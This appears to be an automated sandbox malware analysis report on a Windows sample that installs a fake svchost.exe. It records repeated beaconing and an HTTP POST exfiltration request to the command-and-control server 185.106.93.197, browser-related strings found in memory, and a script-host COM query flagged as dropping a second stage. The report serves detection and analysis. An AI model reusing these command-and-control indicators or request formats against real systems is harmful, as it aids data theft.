Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.106.93.197

Source: unknown

HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: svchost.exe, 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006FCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.000000000707F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.106.93.197
Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006FCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.000000000707F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/Pro
Source: svchost.exe, 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.106H
Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\comref\svchost.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\comref\svchost.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_002E6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_002E6FAA

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002E848E	0_2_002E848E
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002F00B7	0_2_002F00B7
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002F4088	0_2_002F4088
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002E40FE	0_2_002E40FE
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002F7153	0_2_002F7153
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_003051C9	0_2_003051C9
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002E32F7	0_2_002E32F7
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002F62CA	0_2_002F62CA
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002F43BF	0_2_002F43BF
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002EC426	0_2_002EC426
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002EF461	0_2_002EF461
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_0030D440	0_2_0030D440
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002F77EF	0_2_002F77EF
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002E286B	0_2_002E286B
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_0030D8EE	0_2_0030D8EE
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002EE9B7	0_2_002EE9B7
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_003119F4	0_2_003119F4
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002F6CDC	0_2_002F6CDC
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002F3E0B	0_2_002F3E0B
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_00304F9A	0_2_00304F9A
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002EEFE2	0_2_002EEFE2
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB780D74	14_2_00007FFAAB780D74
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB9473FB	14_2_00007FFAAB9473FB
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB946B7D	14_2_00007FFAAB946B7D
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB946960	14_2_00007FFAAB946960
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB93094D	14_2_00007FFAAB93094D
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB945155	14_2_00007FFAAB945155
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB93000A	14_2_00007FFAAB93000A
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB946DF3	14_2_00007FFAAB946DF3
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB946CF2	14_2_00007FFAAB946CF2

Source: Joe Sandbox View	Dropped File: C:\Users\user\Desktop\ApTjSBhc.log A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
Source: Joe Sandbox View	Dropped File: C:\Users\user\Desktop\LMrHnriI.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: String function: 002FEB78 appears 39 times
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: String function: 002FF5F0 appears 31 times
